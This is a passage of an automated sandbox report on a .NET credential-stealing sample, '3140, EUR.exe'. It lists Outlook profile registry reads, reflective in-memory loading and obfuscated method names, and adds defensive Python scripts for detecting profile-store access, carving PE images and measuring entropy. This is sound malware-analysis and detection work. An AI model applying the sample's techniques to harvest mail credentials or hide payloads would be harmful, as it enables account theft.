Source: C:\Users\user\Desktop\3140, EUR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\3140, EUR.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
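The key opened above, HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, is the subkey under which Outlook stores per-account settings, including the mail credentials it keeps for some account types; a read of it by a process other than Outlook is the signal behind "Tries to steal Mail credentials (via file / registry access)". The following detection check is an added example and not part of the Joe Sandbox report. It runs a rule over constructed Windows Security audit events (4656 and 4663, which Windows only emits for a key that carries an audit SACL) written in a simplified `EventID|ProcessName|ObjectName` form; the SID, the log lines and the allow-list are assumptions to adapt to your estate.

```python
"""Rule over registry-access audit events for the Outlook profile store.

Added example, not part of the Joe Sandbox report. Events are constructed in a
simplified 'EventID|ProcessName|ObjectName' form; real 4656/4663 events carry
these as separate fields and require an audit SACL on the key.
"""
import re

# The profile-store subkey for any Office version (14.0, 15.0, 16.0, ...)
# and any profile name, wherever the hive appears in the object path.
OUTLOOK_PROFILE_KEY = re.compile(
    r"\\Software\\Microsoft\\Office\\\d+\.\d+\\Outlook\\Profiles\\[^\\]+"
    r"\\9375CFF0413111d3B88A00104B2A6676",
    re.IGNORECASE,
)
REGISTRY_ACCESS_EVENTS = {4656, 4663}   # handle requested / object accessed
ALLOWED_IMAGES = {"outlook.exe"}        # assumption: extend with known-good tooling

# Constructed audit events (not from the report). OUTLOOK.EXE reading its own
# profile is benign; the two sample process paths are the ones the report lists;
# the last two lines touch keys that are not the profile store.
SAMPLE_EVENTS = r"""
4663|C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|\REGISTRY\USER\S-1-5-21-1004\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
4656|C:\Users\user\Desktop\3140, EUR.exe|\REGISTRY\USER\S-1-5-21-1004\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
4663|C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe|\REGISTRY\USER\S-1-5-21-1004\Software\Microsoft\Office\16.0\Outlook\Profiles\Work\9375CFF0413111d3B88A00104B2A6676\00000002
4663|C:\Windows\System32\svchost.exe|\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
4663|C:\Users\user\Desktop\3140, EUR.exe|\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
""".strip().splitlines()


def parse_event(line):
    """Split one constructed 'EventID|ProcessName|ObjectName' record."""
    event_id, process, obj = line.split("|", 2)
    return int(event_id), process, obj


def outlook_profile_access_alerts(lines):
    """(process, object) for every access event on the profile store by a
    process whose image name is not on the allow-list."""
    alerts = []
    for line in lines:
        event_id, process, obj = parse_event(line)
        if event_id not in REGISTRY_ACCESS_EVENTS or not OUTLOOK_PROFILE_KEY.search(obj):
            continue
        image = process.rsplit("\\", 1)[-1].lower()
        if image in ALLOWED_IMAGES:
            continue
        alerts.append((process, obj))
    return alerts


if __name__ == "__main__":
    for process, obj in outlook_profile_access_alerts(SAMPLE_EVENTS):
        print(f"ALERT {process} -> {obj}")
```

Matching on the 9375CFF0413111d3B88A00104B2A6676 subkey rather than on the whole path keeps the rule independent of the Office version (15.0 in this report, 16.0 on current installs) and of the profile name, which is "Outlook" by default but is user-chosen.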
Source: 3140, EUR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 3140, EUR.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 3140, EUR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: OqNV.pdb source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source: Binary string: OqNV.pdbSHA256/{ source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source: Binary string: OqNV.pdb|D source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs .Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.3831c20.2.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs .Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs .Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.7600000.4.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
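A method that calls System.Reflection.Assembly.Load(byte[]) hands the CLR a PE image that never touches disk, which is why the `.raw.unpack` sources above are memory regions rather than files: the sandbox dumped the process and carved the loaded images out. The following script is an added example, not part of the Joe Sandbox report or of the sample. Given a raw memory region it locates every PE image, rejects stray "MZ" bytes, checks whether IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (data directory 14, the CLR header) is populated, and decodes the DllCharacteristics flags that the static PE lines of this report list (DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE). The sample region is constructed from minimal synthetic headers so the script runs offline.

```python
"""Carve PE images out of a raw memory region and flag the .NET ones.

Added example, not part of the Joe Sandbox report or the sample. Only the
standard library is used; the region below is constructed, not a real dump.
"""
import struct

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def parse_pe(region, off):
    """Describe the PE image at region[off:], or return None if the headers are not sane."""
    if region[off:off + 2] != b"MZ" or off + 0x40 > len(region):
        return None
    e_lfanew = struct.unpack_from("<I", region, off + 0x3C)[0]
    pe = off + e_lfanew
    if pe + 24 > len(region) or region[pe:pe + 4] != b"PE\0\0":
        return None
    num_sections = struct.unpack_from("<H", region, pe + 6)[0]
    size_opt = struct.unpack_from("<H", region, pe + 20)[0]
    opt = pe + 24                                   # IMAGE_OPTIONAL_HEADER
    if size_opt < 96 or opt + size_opt > len(region):
        return None
    magic = struct.unpack_from("<H", region, opt)[0]
    if magic == 0x10B:                              # PE32
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:                            # PE32+
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        return None
    dllchar = struct.unpack_from("<H", region, opt + 70)[0]   # same offset in both formats
    ndirs = struct.unpack_from("<I", region, ndirs_off)[0]
    clr_rva = clr_size = 0
    clr_entry = dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    if ndirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR and clr_entry + 8 <= opt + size_opt:
        clr_rva, clr_size = struct.unpack_from("<II", region, clr_entry)
    return {
        "offset": off,
        "pe32plus": magic == 0x20B,
        "sections": num_sections,
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "dll_characteristics": sorted(n for bit, n in DLL_CHARACTERISTICS.items() if dllchar & bit),
    }


def carve(region):
    """Every sane PE image in the region; stray 'MZ' bytes are rejected by parse_pe."""
    found, pos = [], region.find(b"MZ")
    while pos != -1:
        info = parse_pe(region, pos)
        if info:
            found.append(info)
        pos = region.find(b"MZ", pos + 1)
    return found


def build_minimal_pe32(dotnet, dllchar):
    """Constructed test image (not the sample): DOS header + PE32 headers, no sections."""
    size_opt = 96 + 16 * 8                          # PE32 optional header with 16 directories
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, size_opt, 0x0102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)                   # Magic = PE32
    struct.pack_into("<H", opt, 70, dllchar)                # DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                     # NumberOfRvaAndSizes
    if dotnet:                                              # CLR header RVA/size (values arbitrary)
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2008, 0x48)
    return dos + b"PE\0\0" + file_hdr + bytes(opt)


# Constructed "memory region": a decoy 'MZ', a .NET image carrying the four flags
# the report lists for the sample, then a native image with only NX_COMPAT.
SAMPLE_REGION = (
    b"\0" * 64
    + b"MZ not a header"
    + b"\0" * 0x100
    + build_minimal_pe32(dotnet=True, dllchar=0x8540)
    + b"\xCC" * 32
    + build_minimal_pe32(dotnet=False, dllchar=0x0100)
)

if __name__ == "__main__":
    for hit in carve(SAMPLE_REGION):
        print(hit)
```

On a real dump the carved images are loaded from memory, so their section data is laid out at virtual rather than file offsets; the header checks above still apply unchanged, but writing a carved image back to a file for tooling such as dnSpy or ILSpy means rebasing the sections first.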
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07857080 pushad ; ret 0_2_07857081
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07857082 push esp; ret 0_2_07857089
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07853E78 push eax; mov dword ptr [esp], ecx 0_2_07853E7C
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_01080D92 pushfd ; iretd 9_2_01080DF9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_01080DFA pushfd ; iretd 9_2_01080DF9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B7CC push esp; iretd 9_2_0763B7CD
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B7DD push ebp; iretd 9_2_0763B7DE
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B7B5 push ebx; iretd 9_2_0763B7B7
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763766B push ebp; iretd 9_2_07637672
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07637633 push ebp; iretd 9_2_07637642
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076376AF push esi; iretd 9_2_076376B2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07637693 push esi; iretd 9_2_076376A2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076375C3 push ebx; iretd 9_2_076375D2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B5C1 push esp; iretd 9_2_0763B5C3
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076375D3 push esp; iretd 9_2_07637602
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076375B3 push ebx; iretd 9_2_076375C2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B5B0 push ebp; iretd 9_2_0763B5B1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763E1CB push esp; iretd 9_2_0763E1D6
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BC67 push esi; iretd 9_2_0763BC68
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BC78 push esp; iretd 9_2_0763BC7A
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BC55 push ebx; iretd 9_2_0763BC57
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BC3F push ebx; iretd 9_2_0763BC41
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BBE4 push esp; iretd 9_2_0763BBE6
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BBD3 push esi; iretd 9_2_0763BBD4
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BA71 push esp; iretd 9_2_0763BA72
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BAA9 push esp; iretd 9_2_0763BAAB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BA98 push esi; iretd 9_2_0763BA99
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B8F0 push ebx; iretd 9_2_0763B8F2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B8C9 push esp; iretd 9_2_0763B8CB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B8A7 push esp; iretd 9_2_0763B8A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B8B8 push esi; iretd 9_2_0763B8B9
Source: 3140, EUR.exe Static PE information: section name: .text entropy: 7.773152694651227
Source: lkuPOyvaWlIu.exe.0.dr Static PE information: section name: .text entropy: 7.773152694651227
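The two lines above report a .text section at 7.77 bits per byte, close to the 8.0 ceiling and far above what compiled code produces, which is the footprint of an embedded encrypted or compressed payload; the "High entropy of concatenated method names" lines that follow apply the same measurement to identifiers, where random mixed-case strings score well above word-like names. The script below is an added example and not part of the Joe Sandbox report or the sample: one Shannon-entropy routine applied to constructed section contents and to method names quoted from this report. The thresholds are assumptions chosen to illustrate the separation, not the sandbox's own values.

```python
"""Shannon entropy as applied to a PE section and to concatenated method names.

Added example, not part of the Joe Sandbox report or the sample. Thresholds
are assumptions for illustration.
"""
import math
from collections import Counter


def shannon_entropy(data):
    """Bits per symbol over a bytes object or str; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_is_packed(section_bytes, threshold=7.0):
    """Assumed threshold: ordinary compiled code sits well below 7 bits/byte;
    the report's .text section (7.77) would clear it."""
    return shannon_entropy(section_bytes) >= threshold


def method_names_look_obfuscated(names, threshold=4.8):
    """Assumed threshold: English-like identifiers stay around 4.0-4.5 bits per
    character, random mixed-case alphanumerics exceed 5."""
    return shannon_entropy("".join(names)) >= threshold


# Method names quoted from the report: one renamed class, and the override
# names (which obfuscators must leave intact) that other classes still show.
OBFUSCATED_NAMES = ['GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns',
                    'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO']
PLAIN_NAMES = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dispose',
               'ProcessDialogKey', 'ToString', 'Next', 'NextBytes']

# Constructed section contents: every byte value equally often (a stand-in for
# encrypted data) versus a NOP sled with a few int3 bytes.
PACKED_SECTION = bytes(range(256)) * 4
PLAIN_SECTION = b"\x90" * 100 + b"\xCC" * 28

if __name__ == "__main__":
    print(f"packed section:   {shannon_entropy(PACKED_SECTION):.2f} bits/byte")
    print(f"plain section:    {shannon_entropy(PLAIN_SECTION):.2f} bits/byte")
    print(f"obfuscated names: {shannon_entropy(''.join(OBFUSCATED_NAMES)):.2f} bits/char")
    print(f"plain names:      {shannon_entropy(''.join(PLAIN_NAMES)):.2f} bits/char")
```

Entropy alone does not distinguish compression from encryption, and a .NET resource section full of legitimate compressed images can also score high; the finding is strong here because it coincides with the Assembly.Load(byte[]) calls and the renamed methods in the same sections.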
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, r35OtXmVa9mbccyjMN.cs High entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, IaNmoTU1Jas5HiM3Qc.cs High entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, pnbAqGRE0nfnZVOLAq.cs High entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, DgRGmDbjU6lUJhfE0v8.cs High entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs High entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, clSYfYveg2noAM7P8e.cs High entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, k9RBG6DgUfX4TknVHW.cs High entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, DZt0vvzJwZJilcpPKx.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, okXpofgYeVULwIjxF3.cs High entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, MU4Oupc1dL6Nvwl4EF.cs High entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, jHN6pNdJjWN1aRaPiD.cs High entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, jDZx6yMTIJBBgdc5M9.cs High entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, c43BOPb17cTkFlcAFvH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, JaiguuulGFOV4gjVP9.cs High entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, onTDHLANSwQB4GuLwN.cs High entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, IYkmttbvFwlONMhZ0Rx.cs High entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, BNDjbyKEiDpGcvSWK6.cs High entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, kBEQvpZQ0mEMjME0yK.cs High entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, cxJt6jqq06XAko1daI.cs High entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, a5HLPykg5ohEWJsiPN.cs High entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, r35OtXmVa9mbccyjMN.cs High entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, IaNmoTU1Jas5HiM3Qc.cs High entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, pnbAqGRE0nfnZVOLAq.cs High entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, DgRGmDbjU6lUJhfE0v8.cs High entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs High entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, clSYfYveg2noAM7P8e.cs High entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, k9RBG6DgUfX4TknVHW.cs High entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, DZt0vvzJwZJilcpPKx.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, okXpofgYeVULwIjxF3.cs High entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, MU4Oupc1dL6Nvwl4EF.cs High entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, jHN6pNdJjWN1aRaPiD.cs High entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, jDZx6yMTIJBBgdc5M9.cs High entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, c43BOPb17cTkFlcAFvH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, JaiguuulGFOV4gjVP9.cs High entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
